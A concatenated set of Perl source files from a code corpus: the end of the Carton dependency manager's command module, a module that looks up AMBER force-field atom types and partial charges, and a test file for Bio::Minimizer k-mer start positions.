my($temp, @args) = @_;
$self->print(sprintf($temp, @args), $type);
}
sub print {
my($self, $msg, $type) = @_;
my $fh = $type && $type >= WARN ? *STDERR : *STDOUT;
print {$fh} $msg;
}
sub error {
my($self, $msg) = @_;
$self->print($msg, ERROR);
Carton::Error::CommandExit->throw;
}
sub cmd_help {
my $self = shift;
my $module = $_[0] ? ("Carton::Doc::" . ucfirst $_[0]) : "Carton.pm";
system "perldoc", $module;
}
sub cmd_version {
my $self = shift;
$self->print("carton $Carton::VERSION\n");
}
sub cmd_bundle {
my($self, @args) = @_;
my $env = Carton::Environment->build;
$env->snapshot->load;
$self->print("Bundling modules using @{[$env->cpanfile]}\n");
my $builder = Carton::Builder->new(
mirror => $self->mirror,
cpanfile => $env->cpanfile,
);
$builder->bundle($env->install_path, $env->vendor_cache, $env->snapshot);
$self->printf("Complete! Modules were bundled into %s\n", $env->vendor_cache, SUCCESS);
}
sub cmd_fatpack {
my($self, @args) = @_;
my $env = Carton::Environment->build;
require Carton::Packer;
Carton::Packer->new->fatpack_carton($env->vendor_bin);
}
sub cmd_install {
my($self, @args) = @_;
my($install_path, $cpanfile_path, @without);
$self->parse_options(
\@args,
"p|path=s" => \$install_path,
"cpanfile=s" => \$cpanfile_path,
"without=s" => sub { push @without, split /,/, $_[1] },
"deployment!" => \my $deployment,
"cached!" => \my $cached,
);
my $env = Carton::Environment->build($cpanfile_path, $install_path);
$env->snapshot->load_if_exists;
if ($deployment && !$env->snapshot->loaded) {
$self->error("--deployment requires cpanfile.snapshot: Run `carton install` and make sure cpanfile.snapshot is checked into your version control.\n");
}
my $builder = Carton::Builder->new(
cascade => 1,
mirror => $self->mirror,
without => \@without,
cpanfile => $env->cpanfile,
);
# TODO: --without with no .lock won't fetch the groups, resulting in insufficient requirements
if ($deployment) {
$self->print("Installing modules using @{[$env->cpanfile]} (deployment mode)\n");
$builder->cascade(0);
} else {
$self->print("Installing modules using @{[$env->cpanfile]}\n");
}
# TODO merge CPANfile git to mirror even if lock doesn't exist
if ($env->snapshot->loaded) {
my $index_file = $env->install_path->child("cache/modules/02packages.details.txt");
$index_file->parent->mkpath;
$env->snapshot->write_index($index_file);
$builder->index($index_file);
}
if ($cached) {
$builder->mirror(Carton::Mirror->new($env->vendor_cache));
}
$builder->install($env->install_path);
unless ($deployment) {
$env->cpanfile->load;
$env->snapshot->find_installs($env->install_path, $env->cpanfile->requirements);
$env->snapshot->save;
}
$self->print("Complete! Modules were installed into @{[$env->install_path]}\n", SUCCESS);
}
sub cmd_show {
my($self, @args) = @_;
my $env = Carton::Environment->build;
$env->snapshot->load;
for my $module (@args) {
my $dist = $env->snapshot->find($module)
or $self->error("Couldn't locate $module in cpanfile.snapshot\n");
$self->print( $dist->name . "\n" );
}
}
sub cmd_list {
my($self, @args) = @_;
my $format = 'name';
$self->parse_options(
\@args,
"distfile" => sub { $format = 'distfile' },
);
my $env = Carton::Environment->build;
$env->snapshot->load;
for my $dist ($env->snapshot->distributions) {
$self->print($dist->$format . "\n");
}
}
sub cmd_tree {
my($self, @args) = @_;
my $env = Carton::Environment->build;
$env->snapshot->load;
$env->cpanfile->load;
my %seen;
my $dumper = sub {
my($dependency, $reqs, $level) = @_;
return if $level == 0;
return Carton::Tree::STOP if $dependency->dist->is_core;
return Carton::Tree::STOP if $seen{$dependency->distname}++;
$self->printf( "%s%s (%s)\n", " " x ($level - 1), $dependency->module, $dependency->distname, INFO );
};
$env->tree->walk_down($dumper);
}
sub cmd_check {
my($self, @args) = @_;
my $cpanfile_path;
$self->parse_options(
\@args,
"cpanfile=s" => \$cpanfile_path,
);
my $env = Carton::Environment->build($cpanfile_path);
$env->snapshot->load;
$env->cpanfile->load;
# TODO remove snapshot
# TODO pass git spec to Requirements?
my $merged_reqs = $env->tree->merged_requirements;
my @missing;
for my $module ($merged_reqs->required_modules) {
my $install = $env->snapshot->find_or_core($module);
if ($install) {
unless ($merged_reqs->accepts_module($module => $install->version_for($module))) {
push @missing, [ $module, 1, $install->version_for($module) ];
}
} else {
push @missing, [ $module, 0 ];
}
}
if (@missing) {
$self->print("Following dependencies are not satisfied.\n", INFO);
for my $missing (@missing) {
my($module, $unsatisfied, $version) = @$missing;
if ($unsatisfied) {
$self->printf(" %s has version %s. Needs %s\n",
$module, $version, $merged_reqs->requirements_for_module($module), INFO);
} else {
$self->printf(" %s is not installed. Needs %s\n",
$module, $merged_reqs->requirements_for_module($module), INFO);
}
}
$self->printf("Run `carton install` to install them.\n", INFO);
Carton::Error::CommandExit->throw;
} else {
$self->print("cpanfile's dependencies are satisfied.\n", INFO);
}
}
sub cmd_update {
my($self, @args) = @_;
my $env = Carton::Environment->build;
$env->cpanfile->load;
my $cpanfile = Module::CPANfile->load($env->cpanfile);
@args = grep { $_ ne 'perl' } $env->cpanfile->required_modules unless @args;
$env->snapshot->load;
my @modules;
for my $module (@args) {
my $dist = $env->snapshot->find_or_core($module)
or $self->error("Could not find module $module.\n");
next if $dist->is_core;
push @modules, "$module~" . $env->cpanfile->requirements_for_module($module);
}
return unless @modules;
my $builder = Carton::Builder->new(
mirror => $self->mirror,
cpanfile => $env->cpanfile,
);
$builder->update($env->install_path, @modules);
$env->snapshot->find_installs($env->install_path, $env->cpanfile->requirements);
$env->snapshot->save;
}
sub cmd_run {
my($self, @args) = @_;
local $UseSystem = 1;
$self->cmd_exec(@args);
}
sub cmd_exec {
my($self, @args) = @_;
my $env = Carton::Environment->build;
$env->snapshot->load;
# allows -Ilib
@args = map { /^(-[I])(.+)/ ? ($1,$2) : $_ } @args;
while (@args) {
if ($args[0] eq '-I') {
warn "exec -Ilib is deprecated. You might want to run: carton exec perl -Ilib ...\n";
splice(@args, 0, 2);
} else {
last;
}
}
$self->parse_options_pass_through(\@args); # to handle --
unless (@args) {
$self->error("carton exec needs a command to run.\n");
}
# PERL5LIB takes care of arch
my $path = $env->install_path;
local $ENV{PERL5LIB} = "$path/lib/perl5";
local $ENV{PATH} = "$path/bin:$ENV{PATH}";
if ($UseSystem) {
system @args;
} else {
exec @args;
exit 127; # command not found
}
}
1;
| 26.05665 | 158 | 0.557142 |
ed7b6090c709a42e0d394497d023ba5b6e951bf8 | 7,698 | pm | Perl | oniom/taopackage_bilab/ESPT/bak_AMBERFF.pm | BILAB/scripts | 8d9dbc1eddcf97d7da41930c29c8034480eab85d | [
"MIT"
] | null | null | null | oniom/taopackage_bilab/ESPT/bak_AMBERFF.pm | BILAB/scripts | 8d9dbc1eddcf97d7da41930c29c8034480eab85d | [
"MIT"
] | null | null | null | oniom/taopackage_bilab/ESPT/bak_AMBERFF.pm | BILAB/scripts | 8d9dbc1eddcf97d7da41930c29c8034480eab85d | [
"MIT"
] | null | null | null | package ESPT::AMBERFF;
our $VERSION = '0.01';
### Version History ###
# 0.01 Read in AMBER library file and prep file
#
=head1 NAME
ESPT::AMBERFF - AMBER Force Field for Atom type and partial charges lookup
=head1 SYNOPSIS
use ESPT::AMBERFF;
=head1 DESCRIPTION
This module read in AMBER library file (lib file) and given prep files for
atom type and partial charges lookup.
=head2 Partial Charges and Atom Type look up
When passing residue name and atom name, this object will be able to return the
atom type and partial charges for this specific atom.
=cut
=head1 ATTRIBUTES
=over 15
=item B<$file-E<gt>new()>
Creates a new AMBERFF object
=cut
use strict;
use warnings;
our %ffatmtyp;
our %ffelenum;
our %ffparchg;
our @ffresiduelist;
our $amberlibfile = "/Users/masa/src/taopackage/ESPT/amberff/all_amino03.lib";
our $prepfolder = "/Users/masa/src/taopackage/ESPT/prepfiles";
my $curresid;
my $endresidue;
my $curatmnam;
my $curatmtyp;
my $curelenum;
my $curparchg;
my $prepfile;
my $prepfilewpath;
my $line1;
my $line2;
my $templine;
my $debug = 4;
print "Open file $amberlibfile to read in AMBER residue template.\n" if $debug >= 5;
open(AMBERFFFILE,$amberlibfile) || die "Could not read AMBEF library file $amberlibfile\n$!\n";
# Reading AMBER Residue, Atom, Partial charges from AMBER library file $amberlibfile
while (<AMBERFFFILE>) {
if (/^!entry.(\S\S\S).unit.atoms\s+table/) {
$curresid = $1;
push (@ffresiduelist,$curresid);
# add current residue as one hash element
# print "Current Residue is $1.\n";
$endresidue=0;
do {
$_ = <AMBERFFFILE>;
if (!/\s+"(\S+)"\s+"(\S+)"\s+-*\d+\s+-*\d+\s+-*\d+\s+-*\d+\s+(\d+)\s+(-*\d+.\d+)/) {$endresidue = 1;}
else {
# print "Current atom name is $1, atom type is $2, element number is $3, partial charge is $4.\n";
$curatmnam = $1;
$curatmtyp = $2;
$curelenum = $3,
$curparchg = $4;
$ffatmtyp{$curresid}{$curatmnam} = $curatmtyp ;
$ffelenum{$curresid}{$curatmnam} = $curelenum ;
$ffparchg{$curresid}{$curatmnam} = $curparchg ;
# print "Atom with name $curatmnam in residue $curresid has type $ffatmtyp{$curresid}{$curatmnam},";
# print " element number $ffelenum{$curresid}{$curatmnam}, partial charges $ffparchg{$curresid}{$curatmnam}.\n";
} # else
} while ($endresidue == 0); # do
} # if (/^!entry.\S\S\S.unit.atoms\s+table/)
} # while (<AMBERFFFILE>)
close (AMBERFFFILE);
# Almost every ONIOM calculation has substrate(s) which is (are) not amino acid.
# If prepared by AMBER, user will have prep files for these molecules.
# The following code can read these prep files from folder $prepfolder, and
# take atom name, atom type and partial charges information.
# The code assumes each prep file has this format:
# 0 0 2
#
#This is a remark line
#A5P_dianion.res
#AP2 INT 0
#CORRECT OMIT DU BEG
# 0.0000
# 1 DUMM DU M 0 -1 -2 0.000 .0 .0 .00000
# 2 DUMM DU M 1 0 -1 1.449 .0 .0 .00000
# 3 DUMM DU M 2 1 0 1.522 111.1 .0 .00000
# 4 O1 o M 3 2 1 1.540 111.208 180.000 -0.58161 8
# 5 C1 c M 4 3 2 1.193 54.434 109.126 0.54347 6
# 6 H1 h4 E 5 4 3 1.093 120.987 -156.388 0.00162 1
#...
# Please note that original prep file does not have element number. To be safe,
# user should add element number for each atom at the end of line. In this way
# it is guaranteed that correct atom symole will be put in the output file
opendir(PREPDIR,$prepfolder) || die "Could not open prep file folder $prepfolder\n$!\n";
foreach $prepfile (readdir(PREPDIR)) {
if ( $prepfile =~ /^\./ ) {next;}
print "Reading prep file $prepfile ...\n" if $debug >= 5;
$prepfilewpath = $prepfolder."/".$prepfile;
# print "$prepfilewpath\n";
open(PREPFILE,$prepfilewpath) || die "Could not read prep file $prepfile in directory $prepfolder\n$!\n";
$line1 = "";
$line2 = "";
$templine = "";
while ($templine = <PREPFILE>) {
$line1 = $line2;
$line2 = $templine;
if ( $line2 =~ /^\s*CORR/) {
$line1 =~ /^(\S\S\S)\s+/;
# add current residue as one hash element
# print "Current Residue is $1.\n";
$curresid = $1;
push (@ffresiduelist,$curresid);
# Skip 0.000 and first three DUMM lines after CORR line
$templine = <PREPFILE>;
$templine = <PREPFILE>;
$templine = <PREPFILE>;
$templine = <PREPFILE>;
# clear $line1 and $line2;
$line1 = "";
$line2 = "";
$endresidue=0;
do {
$_ = <PREPFILE>;
if (!/\s+\d+\s+(\S+)\s+(\S+)\s+\S+\s+-*\d+\s+-*\d+\s+-*\d+\s+-*\d+.\d+\s+-*\d+.\d+\s+-*\d+.\d+\s+(-*\d+.\d+)\s+(\d+)/) {$endresidue = 1;}
else {
# print "Current atom name is $1, atom type is $2, element number is $3, partial charge is $4.\n";
$curatmnam = $1;
$curatmtyp = uc($2);
$curparchg = $3;
$curelenum = $4,
$ffatmtyp{$curresid}{$curatmnam} = $curatmtyp ;
$ffelenum{$curresid}{$curatmnam} = $curelenum ;
$ffparchg{$curresid}{$curatmnam} = $curparchg ;
print "Atom with name $curatmnam in residue $curresid has type $ffatmtyp{$curresid}{$curatmnam}," if $debug >= 5;
print " element number $ffelenum{$curresid}{$curatmnam}, partial charges $ffparchg{$curresid}{$curatmnam}.\n" if $debug >= 5;
} # else
} while ($endresidue == 0); # do
} # if ( $line2 =~ /^\s+CORR/) {
} # while (<PREPFILE>) {
close PREPFILE;
} # foreach $prepfile (readdir(PREPDIR))
sub new {
our $AMBERFF = {};
shift;
$AMBERFF->{DEBUG} = shift;
# print "AMBEREE debug is ",$AMBERFF->{DEBUG},"\n";
bless ($AMBERFF);
return $AMBERFF;
} # new
# Subroutine atomtype takes atom type for current atom
sub atomtype {
my $curresidue;
my $curatomname;
my $curatomtype;
shift;
$curresidue = shift;
$curatomname = shift;
# print "Atom type inquary for residue $curresidue and atom $curatomname:\n";
$curatomtype = $ffatmtyp{$curresidue}{$curatomname};
return $curatomtype;
} # atometype
# Subroutine elementnumber takes element number for current atom
sub elementnumber {
my $curresidue;
my $curatomname;
my $curelenum;
shift;
$curresidue = shift;
$curatomname = shift;
# print "Element number inquary for residue $curresidue and atom $curatomname:\n";
$curelenum = $ffelenum{$curresidue}{$curatomname};
return $curelenum;
} # elementnumber
# Subroutine partialcharge takes partial charge for current atom
sub partialcharge {
my $curresidue;
my $curatomname;
my $curparchg;
shift;
$curresidue = shift;
$curatomname = shift;
# print "Element number inquary for residue $curresidue and atom $curatomname:\n";
$curparchg = $ffparchg{$curresidue}{$curatomname};
return $curparchg;
} # partialcharge
# Subroutine existsresidue checks if the given residue exists or not.
sub existsresidue {
my $curresidue;
my $currele;
my $exists = 0;
shift;
$curresidue = shift;
foreach $currele (@ffresiduelist) {
if ( uc($currele) eq uc($curresidue)) {
$exists = 1;
last;
}
}
return $exists;
} # existsresidue
1;
__END__
=back
=head1 VERSION
0.01
=head1 SEE ALSO
F<ESPT::PDB>
=head1 AUTHOR
Peng Tao, E<lt>tao.21@osu.eduE<gt>
=head1 COPYRIGHT
Copyright (c) 2009~2010 by Peng Tao
=cut
| 23.981308 | 145 | 0.605612 |
ed8552ea9cc344ca272467d2a7d27e56f364739e | 1,596 | t | Perl | t/05_starts.t | lskatz/Bio--Minimizer | 5b12f1d85e7798227530154432c19cbb84c8f645 | [
"MIT"
] | null | null | null | t/05_starts.t | lskatz/Bio--Minimizer | 5b12f1d85e7798227530154432c19cbb84c8f645 | [
"MIT"
] | 2 | 2019-10-10T20:19:48.000Z | 2019-10-22T01:53:58.000Z | t/05_starts.t | lskatz/Bio--Minimizer | 5b12f1d85e7798227530154432c19cbb84c8f645 | [
"MIT"
] | null | null | null | #!/usr/bin/env perl
use strict;
use warnings;
use Data::Dumper;
use Test::More tests=>3;
use FindBin qw/$RealBin/;
use lib "$RealBin/../lib";
use_ok 'Bio::Minimizer';
my $sequence = "CTATAGTTCGTCCAGCGTCTTTGAGGGTAATCATTCGAGGAACCGGACCTTTAATCACGGCTTACTTCAGTCACAAGAGGCGCTCAGACCGACCTGCATCTGGTCAGGGCCCCAGAATCACTTTTAATACTTTAGTCGGTACGTGAGGGACAGACCCAAAGGTACCGGGGCTGATTGTTATGAAGGGTTGCTTCACCGCTACGCAGGCCTCTATTCCAGACCGCTAGGCTTCTAACCTGC";
subtest 'minimizer => starts (k=>19,l=>5)' => sub{
plan tests=>7;
my $minimizer = Bio::Minimizer->new($sequence,{numcpus=>1,k=>19,l=>5});
is($$minimizer{k}, 19, "Expected kmer length");
is($$minimizer{l}, 5, "Expected lmer length");
my $starts = $minimizer->{starts};
is_deeply([sort {$a <=> $b } @{ $$starts{AATCA}}], [28,52,64,115], "AATCA");
is_deeply([sort {$a <=> $b } @{ $$starts{AGCCT}}], [10], "AGCCT");
is_deeply([sort {$a <=> $b } @{ $$starts{ACGTA}}], [96], "ACGTA");
is_deeply([sort {$a <=> $b } @{ $$starts{AGACC}}], [217], "AGACC");
is_deeply([sort {$a <=> $b } @{ $$starts{AGATG}}], [139], "AGATG");
};
subtest 'minimizer => starts (k=>31,l=>21)' => sub{
plan tests=>5;
my $minimizer = Bio::Minimizer->new($sequence,{numcpus=>1});
is($$minimizer{k}, 31, "Expected default kmer length");
is($$minimizer{l}, 21, "Expected default lmer length");
my $starts = $minimizer->{starts};
is_deeply($$starts{ACTTTAGTCGGTACGTGAGGG}, [128], "ACTTTAGTCGGTACGTGAGGG");
is_deeply($$starts{AGCCTAGCGGTCTGGAATAGA}, [10], "AGCCTAGCGGTCTGGAATAGA");
is_deeply($$starts{CCGGTTCCTCGAATGATTACC}, [194], "CCGGTTCCTCGAATGATTACC");
};
| 38.926829 | 258 | 0.674185 |
Subsets and Splits